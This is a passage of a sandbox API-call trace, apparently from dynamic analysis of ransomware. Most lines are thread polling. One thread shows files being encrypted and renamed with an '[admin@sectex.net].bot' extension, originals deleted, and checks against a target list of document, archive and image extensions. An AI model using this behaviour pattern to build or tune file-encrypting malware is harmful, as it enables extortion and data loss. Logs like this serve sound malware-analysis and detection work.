	[0051.712] GetTickCount () returned 0x1147437
	[0051.712] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0052.005] GetTickCount () returned 0x114755f
	[0052.005] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0052.321] GetTickCount () returned 0x1147697
	[0052.322] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0052.914] GetTickCount () returned 0x11478e8
	[0052.914] GetTickCount () returned 0x11478e8
	[0052.914] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0053.414] GetTickCount () returned 0x1147adb
	[0053.414] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0053.584] GetTickCount () returned 0x1147b87
	[0053.584] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0053.723] GetTickCount () returned 0x1147c13
	[0053.723] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0054.808] GetTickCount () returned 0x1148047
	[0054.808] GetTickCount () returned 0x1148047
	[0054.808] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0055.006] GetTickCount () returned 0x1148112
	[0055.006] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0055.217] GetTickCount () returned 0x11481ed
	[0055.217] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0055.341] GetTickCount () returned 0x1148269
	[0055.341] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0055.620] GetTickCount () returned 0x1148373
	[0055.620] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0056.616] GetTickCount () returned 0x1148759
	[0056.616] GetTickCount () returned 0x1148759
	[0056.616] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0056.854] GetTickCount () returned 0x1148853
	[0056.854] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0057.797] GetTickCount () returned 0x1148bfb
	[0057.797] GetTickCount () returned 0x1148bfb
	[0057.797] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0057.924] GetTickCount () returned 0x1148c77
	[0057.924] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0058.197] GetTickCount () returned 0x1148d81
	[0058.197] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0058.476] GetTickCount () returned 0x1148e99
	[0058.476] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0058.844] GetTickCount () returned 0x1149000
	[0058.844] GetTickCount () returned 0x1149000
	[0058.844] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0059.030] GetTickCount () returned 0x11490bc
	[0059.030] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102
	[0059.260] GetTickCount () returned 0x11491a6
	[0059.260] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x0
	[0059.265] GetTickCount () returned 0x11491a6
	[0059.273] Sleep (dwMilliseconds=0x64) 
	[0060.173] GetTickCount () returned 0x114952e
	[0060.173] GetTickCount () returned 0x114952e
	[0060.173] Sleep (dwMilliseconds=0x64) 
	[0060.458] GetTickCount () returned 0x1149657
	[0060.458] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 8
	os_tid = 0x960

	[0032.630] GetTickCount () returned 0x1142eed
	[0032.630] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x24) returned 0x7e09b38
	[0032.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7e09b38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128
	[0032.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7e09b38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130
	[0032.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7e09b38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138
	[0032.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x7e09b38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140
	[0032.637] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e08
	[0032.637] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e08, Size=0x20) returned 0x7df2f18
	[0032.637] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e08
	[0032.637] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e08, Size=0x20) returned 0x7df2ef0
	[0032.637] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.637] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.637] Wow64DisableWow64FsRedirection (in: OldValue=0x9b1ff84 | out: OldValue=0x9b1ff84*=0x0) returned 1
	[0032.637] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.637] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f18 | out: hHeap=0x7d60000) returned 1
	[0032.637] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.637] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2ef0 | out: hHeap=0x7d60000) returned 1
	[0032.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x7e19798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148
	[0032.638] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0032.932] GetTickCount () returned 0x1142fb8
	[0032.932] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0033.563] GetTickCount () returned 0x11431da
	[0033.563] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0033.953] GetTickCount () returned 0x1143360
	[0033.953] GetTickCount () returned 0x1143360
	[0033.953] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0034.351] GetTickCount () returned 0x11434f6
	[0034.367] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0035.257] GetTickCount () returned 0x114366c
	[0035.257] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0035.780] GetTickCount () returned 0x1143840
	[0035.780] GetTickCount () returned 0x1143840
	[0035.780] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0036.206] GetTickCount () returned 0x11439e5
	[0036.206] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0036.348] GetTickCount () returned 0x1143a72
	[0036.348] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0036.488] GetTickCount () returned 0x1143afe
	[0036.488] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0036.996] GetTickCount () returned 0x1143ce2
	[0036.996] GetTickCount () returned 0x1143ce2
	[0036.996] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0037.541] GetTickCount () returned 0x1143ee5
	[0037.541] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0038.048] GetTickCount () returned 0x11440d8
	[0038.048] GetTickCount () returned 0x11440d8
	[0038.048] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0038.477] GetTickCount () returned 0x114425e
	[0038.477] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0038.952] GetTickCount () returned 0x11443f3
	[0038.952] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0039.312] GetTickCount () returned 0x114455a
	[0039.312] GetTickCount () returned 0x114455a
	[0039.312] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0039.693] GetTickCount () returned 0x1144692
	[0039.694] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0039.902] GetTickCount () returned 0x114475d
	[0039.902] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0040.485] GetTickCount () returned 0x1144960
	[0040.485] GetTickCount () returned 0x1144960
	[0040.485] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0040.753] GetTickCount () returned 0x1144a69
	[0040.753] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0041.000] GetTickCount () returned 0x1144b63
	[0041.000] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0041.307] GetTickCount () returned 0x1144c6c
	[0041.307] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0041.682] GetTickCount () returned 0x1144de2
	[0041.682] GetTickCount () returned 0x1144de2
	[0041.682] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0042.142] GetTickCount () returned 0x1144f59
	[0042.142] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0042.488] GetTickCount () returned 0x1145071
	[0042.488] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0042.773] GetTickCount () returned 0x114516b
	[0042.774] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0043.145] GetTickCount () returned 0x11452e1
	[0043.145] GetTickCount () returned 0x11452e1
	[0043.145] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0043.618] GetTickCount () returned 0x11454b5
	[0043.618] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0044.015] GetTickCount () returned 0x114564b
	[0044.015] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0044.389] GetTickCount () returned 0x11457a2
	[0044.389] GetTickCount () returned 0x11457a2
	[0044.389] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0044.701] GetTickCount () returned 0x11458da
	[0044.701] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0045.093] GetTickCount () returned 0x1145a60
	[0045.093] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0045.249] GetTickCount () returned 0x1145afc
	[0045.249] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0045.436] GetTickCount () returned 0x1145bb7
	[0045.436] GetTickCount () returned 0x1145bb7
	[0045.436] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0045.731] GetTickCount () returned 0x1145ce0
	[0045.731] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0046.336] GetTickCount () returned 0x1145f31
	[0046.336] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0046.624] GetTickCount () returned 0x1146059
	[0046.624] GetTickCount () returned 0x1146059
	[0046.624] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0047.649] GetTickCount () returned 0x114645f
	[0047.649] GetTickCount () returned 0x114645f
	[0047.649] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0047.970] GetTickCount () returned 0x1146597
	[0047.970] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0048.137] GetTickCount () returned 0x1146642
	[0048.137] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0048.436] GetTickCount () returned 0x114676b
	[0048.436] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0048.650] GetTickCount () returned 0x1146845
	[0048.650] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0048.805] GetTickCount () returned 0x11468e1
	[0048.805] GetTickCount () returned 0x11468e1
	[0048.805] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0048.986] GetTickCount () returned 0x114698d
	[0048.986] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0050.019] GetTickCount () returned 0x1146d92
	[0050.019] GetTickCount () returned 0x1146d92
	[0050.019] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0050.238] GetTickCount () returned 0x1146e6d
	[0050.238] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0050.712] GetTickCount () returned 0x1147050
	[0050.712] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0051.367] GetTickCount () returned 0x11472df
	[0051.367] GetTickCount () returned 0x11472df
	[0051.367] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0051.712] GetTickCount () returned 0x1147437
	[0051.712] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0052.005] GetTickCount () returned 0x114755f
	[0052.005] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0052.322] GetTickCount () returned 0x1147697
	[0052.322] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0052.914] GetTickCount () returned 0x11478e8
	[0052.914] GetTickCount () returned 0x11478e8
	[0052.914] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0053.414] GetTickCount () returned 0x1147adb
	[0053.414] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0053.584] GetTickCount () returned 0x1147b87
	[0053.584] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0053.723] GetTickCount () returned 0x1147c13
	[0053.724] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0054.809] GetTickCount () returned 0x1148047
	[0054.809] GetTickCount () returned 0x1148047
	[0054.809] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0055.007] GetTickCount () returned 0x1148112
	[0055.007] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0055.217] GetTickCount () returned 0x11481ed
	[0055.217] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0055.341] GetTickCount () returned 0x1148269
	[0055.341] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0055.620] GetTickCount () returned 0x1148373
	[0055.620] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0056.616] GetTickCount () returned 0x1148759
	[0056.616] GetTickCount () returned 0x1148759
	[0056.616] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0056.854] GetTickCount () returned 0x1148853
	[0056.854] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0057.797] GetTickCount () returned 0x1148bfb
	[0057.797] GetTickCount () returned 0x1148bfb
	[0057.798] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0057.924] GetTickCount () returned 0x1148c77
	[0057.924] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0058.197] GetTickCount () returned 0x1148d81
	[0058.197] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0058.476] GetTickCount () returned 0x1148e99
	[0058.476] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0058.844] GetTickCount () returned 0x1149000
	[0058.844] GetTickCount () returned 0x1149000
	[0058.844] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0059.030] GetTickCount () returned 0x11490bc
	[0059.030] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x102
	[0059.280] GetTickCount () returned 0x11491b5
	[0059.280] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x64) returned 0x0
	[0059.280] GetTickCount () returned 0x11491b5
	[0059.280] Sleep (dwMilliseconds=0x64) 
	[0060.173] GetTickCount () returned 0x114952e
	[0060.173] GetTickCount () returned 0x114952e
	[0060.173] Sleep (dwMilliseconds=0x64) 
	[0060.459] GetTickCount () returned 0x1149657
	[0060.459] Sleep (dwMilliseconds=0x64) 

Thread:
	id = 10
	os_tid = 0x97c

	[0032.808] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0x7e3add0
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0x7e4add8
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e68
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0x7e17b30
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e80
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xaa60020
	[0032.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e98
	[0032.809] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e98, Size=0x20) returned 0x7df2f68
	[0032.810] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e98
	[0032.810] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08e98, Size=0x20) returned 0x7df2f90
	[0032.810] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.810] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.810] Wow64DisableWow64FsRedirection (in: OldValue=0x981ff58 | out: OldValue=0x981ff58*=0x0) returned 1
	[0032.810] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.810] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.810] Sleep (dwMilliseconds=0x64) 
	[0032.970] lstrcmpiW (lpString1=".ini", lpString2=".bot") returned 1
	[0032.970] lstrlenW (lpString="desktop.ini") returned 11
	[0032.970] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0032.970] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=129) returned 1
	[0032.970] CloseHandle (hObject=0x170) returned 1
	[0032.970] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26
	[0032.970] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.971] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0032.971] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0032.971] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0032.971] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174
	[0032.972] GetLastError () returned 0x0
	[0032.972] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x81, lpOverlapped=0x0) returned 1
	[0033.165] WriteFile (in: hFile=0x174, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x90, lpOverlapped=0x0) returned 1
	[0033.166] ReadFile (in: hFile=0x170, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.166] WriteFile (in: hFile=0x174, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0033.166] SetEndOfFile (hFile=0x174) returned 1
	[0033.166] CloseHandle (hObject=0x174) returned 1
	[0033.167] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.167] SetEndOfFile (hFile=0x170) returned 1
	[0033.168] CloseHandle (hObject=0x170) returned 1
	[0033.168] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x26) returned 1
	[0033.453] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1
	[0033.453] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.453] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.453] lstrlenW (lpString=".doc") returned 4
	[0033.453] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0033.454] lstrlenW (lpString=".docx") returned 5
	[0033.454] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0033.454] lstrlenW (lpString=".pdf") returned 4
	[0033.454] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString=".xls") returned 4
	[0033.454] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString=".xlsx") returned 5
	[0033.454] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0033.454] lstrlenW (lpString=".ppt") returned 4
	[0033.454] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString=".zip") returned 4
	[0033.454] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString=".rar") returned 4
	[0033.454] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString=".bz2") returned 4
	[0033.454] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0033.454] lstrlenW (lpString=".7z") returned 3
	[0033.454] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString=".dbf") returned 4
	[0033.454] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString=".1cd") returned 4
	[0033.454] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString=".jpg") returned 4
	[0033.454] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.454] lstrlenW (lpString=".doc") returned 4
	[0033.454] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0033.454] lstrlenW (lpString=".docx") returned 5
	[0033.454] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0033.455] lstrlenW (lpString=".pdf") returned 4
	[0033.455] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0033.455] lstrlenW (lpString=".xls") returned 4
	[0033.455] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0033.455] lstrlenW (lpString=".xlsx") returned 5
	[0033.455] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0033.455] lstrlenW (lpString=".ppt") returned 4
	[0033.455] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0033.455] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.455] lstrlenW (lpString=".zip") returned 4
	[0033.455] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0033.455] lstrlenW (lpString=".rar") returned 4
	[0033.455] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0033.455] lstrlenW (lpString=".bz2") returned 4
	[0033.455] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0033.455] lstrlenW (lpString=".7z") returned 3
	[0033.455] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0033.455] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.455] lstrlenW (lpString=".dbf") returned 4
	[0033.455] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0033.455] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.455] lstrlenW (lpString=".1cd") returned 4
	[0033.455] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0033.455] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0033.455] lstrlenW (lpString=".jpg") returned 4
	[0033.455] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0033.455] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.455] lstrlenW (lpString="OutlookMUI.xml") returned 14
	[0033.455] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.456] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=3186) returned 1
	[0033.456] CloseHandle (hObject=0x190) returned 1
